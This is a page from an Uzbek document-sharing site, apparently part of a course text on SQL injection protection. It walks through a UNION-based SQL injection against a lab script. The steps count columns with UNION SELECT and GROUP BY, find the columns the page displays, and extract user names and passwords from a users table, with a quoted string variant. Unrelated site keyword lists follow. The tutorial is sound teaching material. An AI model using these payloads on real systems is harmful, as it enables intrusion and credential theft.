Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017



Download 306,49 Kb.
bet4/24
Sana21.06.2022
Hajmi306,49 Kb.
#689874
1   2   3   4   5   6   7   8   9   ...   24
Bog'liq
Защита от SQL

Maydonlar sonini tanlaymiz
Maydonlarni tanlash juda oddiy, bunday so'rovlarni yuborish kifoya:
sqlinj/index1.php?id=1 UNION SELECT 1,2
Xato ...
sqlinj/index1.php?id=1 UNION SELECT 1,2,3
Yana bir xato!
sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5
Xatolik yo'q! Shunday qilib, ustunlar soni 5 ga teng.


GROUP BY
Ko'pincha 20 yoki 40 yoki hatto 60 ta maydon bo'lishi mumkin. Ularni har safar takrorlash shart emasligi uchun biz GROUP BY dan foydalanamiz
Agar
sqlinj/index1.php?id=1 GROUP BY 2
so'rovi xato chiqmagan bo'lsa, u holda maydonlar soni 2 dan ortiq.
Yana ushbu amalni bajaramiz:
sqlinj/index1.php?id=1 GROUP BY 8
Biz xatoni ko'ramiz, demak maydonlar soni 8 dan kam.
Agar GROUP BY 4 da xato bo'lmasa va GROUP BY 6 da xato bo‘lsa, maydonlar soni 5 ga teng bo‘ladi.


Chiquvchi ustunlarini aniqlash
Birinchi so‘rovda hech narsa ko‘rsatilmasligi uchun mavjud bo‘lmagan identifikatorni almashtirish kifoya, masalan:
sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5
Ushbu amal bilan , biz sahifada qaysi ustunlar ko'rsatilishini aniqladik. endi, bu raqamlarni kerakli ma'lumotlar bilan almashtirish uchun so'rovni davom ettirishingiz kerak.
Ma'lumotlar chiqishi
Aytaylik, id , name va pass maydonlari mavjud bo'lgan users jadvali mavjudligini bilamiz . ID=1 bo'lgan foydalanuvchi haqida ma'lumot olishimiz kerak
Shuning uchun biz shunday so'rovni tuzamiz:
sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1
Skript chiqarishni davom ettiradi
Buning uchun maydonlar nomini, 1 va 3 raqamlari o‘rniga qo`yamiz.
sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1
Biz kerakli narsani oldik!
index2.php skriptidagi kabi "qatorli kiritish" uchun siz boshiga qo`shtirnoq va oxirida sharh belgisini qo'shishingiz kerak. Misol :
sqlinj/index2.php?user=-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20



Download 306,49 Kb.

Do'stlaringiz bilan baham:
1   2   3   4   5   6   7   8   9   ...   24




Ma'lumotlar bazasi mualliflik huquqi bilan himoyalangan ©hozir.org 2024
ma'muriyatiga murojaat qiling

kiriting | ro'yxatdan o'tish
    Bosh sahifa
юртда тантана
Боғда битган
Бугун юртда
Эшитганлар жилманглар
Эшитмадим деманглар
битган бодомлар
Yangiariq tumani
qitish marakazi
Raqamli texnologiyalar
ilishida muhokamadan
tasdiqqa tavsiya
tavsiya etilgan
iqtisodiyot kafedrasi
steiermarkischen landesregierung
asarlaringizni yuboring
o'zingizning asarlaringizni
Iltimos faqat
faqat o'zingizning
steierm rkischen
landesregierung fachabteilung
rkischen landesregierung
hamshira loyihasi
loyihasi mavsum
faolyatining oqibatlari
asosiy adabiyotlar
fakulteti ahborot
ahborot havfsizligi
havfsizligi kafedrasi
fanidan bo’yicha
fakulteti iqtisodiyot
boshqaruv fakulteti
chiqarishda boshqaruv
ishlab chiqarishda
iqtisodiyot fakultet
multiservis tarmoqlari
fanidan asosiy
Uzbek fanidan
mavzulari potok
asosidagi multiservis
'aliyyil a'ziym
billahil 'aliyyil
illaa billahil
quvvata illaa
falah' deganida
Kompyuter savodxonligi
bo’yicha mustaqil
'alal falah'
Hayya 'alal
'alas soloh
Hayya 'alas
mavsum boyicha


yuklab olish